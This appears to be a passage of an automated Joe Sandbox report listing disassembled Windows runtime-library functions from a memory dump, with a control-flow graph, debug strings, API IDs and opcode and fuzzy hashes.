                                                          control_flow_graph 273 3593d770-3593d7ab 274 3593d7b1-3593d7bb 273->274 275 3593d9e7-3593d9ee 273->275 277 3593d7c1-3593d7ca 274->277 278 35989357 274->278 275->274 276 3593d9f4-3598932c 275->276 276->274 281 35989332-35989337 276->281 277->278 280 3593d7d0-3593d7d3 277->280 282 35989361-35989370 278->282 283 3593d9da-3593d9dc 280->283 284 3593d7d9-3593d7db 280->284 286 3593d927-3593d938 call 35964c30 281->286 288 3598934b-35989354 call 359af290 282->288 285 3593d7e1-3593d7e4 283->285 287 3593d9e2 283->287 284->278 284->285 285->278 289 3593d7ea-3593d7ed 285->289 287->289 288->278 292 3593d7f3-3593d7f6 289->292 293 3593d9f9-3593da02 289->293 296 3593da0d-3593da16 292->296 297 3593d7fc-3593d848 call 3593d660 292->297 293->292 298 3593da08-35989346 293->298 296->297 301 3593da1c 296->301 297->286 303 3593d84e-3593d852 297->303 298->288 301->282 303->286 304 3593d858-3593d85f 303->304 305 3593d9d1-3593d9d5 304->305 306 3593d865-3593d869 304->306 307 35989563-3598957b call 359af290 305->307 308 3593d870-3593d87a 306->308 307->286 308->307 309 3593d880-3593d887 308->309 311 3593d889-3593d88d 309->311 312 3593d8ed-3593d90d 309->312 315 3593d893-3593d898 311->315 316 35989372 311->316 314 3593d910-3593d913 312->314 317 3593d915-3593d918 314->317 318 3593d93b-3593d940 314->318 319 35989379-3598937b 315->319 320 3593d89e-3593d8a5 315->320 316->319 321 35989559-3598955e 317->321 322 3593d91e-3593d920 317->322 323 3593d946-3593d949 318->323 324 359894d3-359894db 318->324 319->320 325 35989381-359893aa 319->325 326 359893ea-359893ed 320->326 327 3593d8ab-3593d8e3 call 35968250 320->327 321->286 329 3593d922 322->329 330 3593d971-3593d98c call 3593a6e0 322->330 331 3593da21-3593da2f 323->331 332 3593d94f-3593d952 323->332 324->331 333 359894e1-359894e5 324->333 325->312 334 359893b0-359893ca call 359782c0 325->334 328 359893f1-35989400 call 359782c0 326->328 344 3593d8e5-3593d8e7 327->344 355 35989402-35989410 328->355 356 35989417 328->356 329->286 351 35989528-3598952d 330->351 352 3593d992-3593d9ba 330->352 339 3593d954-3593d964 331->339 342 3593da35-3593da3e 331->342 332->317 332->339 333->331 340 359894eb-359894f4 333->340 334->344 350 359893d0-359893e3 334->350 339->317 346 3593d966-3593d96f 339->346 347 35989512-35989514 340->347 348 359894f6-359894f9 340->348 342->322 344->312 353 35989420-35989424 344->353 346->322 347->331 354 3598951a-35989523 347->354 357 359894fb-35989501 348->357 358 35989503-35989506 348->358 350->334 359 359893e5 350->359 362 3593d9bc-3593d9be 351->362 363 35989533-35989536 351->363 352->362 353->312 365 3598942a-35989430 353->365 354->322 355->328 364 35989412 355->364 356->353 357->347 360 35989508-3598950d 358->360 361 3598950f 358->361 359->312 360->354 361->347 366 35989549-3598954e 362->366 367 3593d9c4-3593d9cb 362->367 363->362 368 3598953c-35989544 363->368 364->312 369 35989432-3598944f 365->369 370 35989457-35989460 365->370 366->286 371 35989554 366->371 367->305 367->308 368->314 369->370 372 35989451-35989454 369->372 373 35989462-35989467 370->373 374 359894a7-359894a9 370->374 371->321 372->370 373->374 375 35989469-3598946d 373->375 376 359894ab-359894c6 call 35924508 374->376 377 359894cc-359894ce 374->377 378 3598946f-35989473 375->378 379 35989475-359894a1 RtlDebugPrintTimes 375->379 376->286 376->377 377->286 378->374 378->379 379->374 383 359894a3 379->383 383->374
                                                          APIs
                                                          Strings
                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 3598936B
                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 35989341, 35989366
                                                          • GsHd, xrefs: 3593D874
                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35989565
                                                          • Actx , xrefs: 35989508
                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35989346
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                          • API String ID: 3446177414-2196497285
                                                          • Opcode ID: abcd8a9dce74a9066631957d6e81ada4fce015f7eeb0d62c4ba00d85a100fa0d
                                                          • Instruction ID: 881861ef49533c9af5c3f350c09b29ce1d0e4e14b0bd2661d77e2ca5eb71538d
                                                          • Opcode Fuzzy Hash: abcd8a9dce74a9066631957d6e81ada4fce015f7eeb0d62c4ba00d85a100fa0d
                                                          • Instruction Fuzzy Hash: E8E1C474609302CFE710CF64C891B5AB7F9BF49398F454A2DE896CB281D771E948CB92
                                                          Function 3596B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                          • Instruction ID: 2d1833444b55c84c6288e2b79897e999f3fcfc1621efb7bcad0d449dbdd7b93a
                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                          • Instruction Fuzzy Hash: 25810578E093098EEF14CE64C8507EEBBBBBF45378F58411AD891A7681EB349848CB51
                                                          Function 35929126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$@
                                                          • API String ID: 3446177414-1194432280
                                                          • Opcode ID: a2f81077e3d3833448af186d9a607d0c4b4fc4f6fdb6b2ebd44e979291b48ac1
                                                          • Instruction ID: c0dab80f85195590ef75690e993b294bb5f71a05fa61a63636953d317d7eb477
                                                          • Opcode Fuzzy Hash: a2f81077e3d3833448af186d9a607d0c4b4fc4f6fdb6b2ebd44e979291b48ac1
                                                          • Instruction Fuzzy Hash: DE8118B5D042699FDB21CB54CD45BDEB7B8AF08750F0041EAE91AB7281E7709E85CFA0
                                                          Function 3595B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3599728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 35997294
                                                          • RTL: Re-Waiting, xrefs: 359972C1
                                                          • RTL: Resource at %p, xrefs: 359972A3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 347ecd733d69148f99bc5730e00df50da2799dcfca2369637776b015630e3b05
                                                          • Instruction ID: 00756dbedafe11658aeaf9bee578c667748a6d7b47c2b3dfbf412c3945c1bd78
                                                          • Opcode Fuzzy Hash: 347ecd733d69148f99bc5730e00df50da2799dcfca2369637776b015630e3b05
                                                          • Instruction Fuzzy Hash: 3E41EF35704206ABE725CF24CC41F9AB7A6FF85760F100A19FD55AB240EB21F816CBE1
                                                          Function 3599F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 8ecc3885bfe21602710cefdecdc7d7ced872827410af6af4fbcd3faef0539866
                                                          • Instruction ID: 6aeb95f073b2135e3b3ce2eb9e3798c3735ca644fa319f0de4b81019f94f2510
                                                          • Opcode Fuzzy Hash: 8ecc3885bfe21602710cefdecdc7d7ced872827410af6af4fbcd3faef0539866
                                                          • Instruction Fuzzy Hash: E15122B5E042199FEF0ACF99E846ACCFBB5FF48394F14812AE805AB250D7389941CF50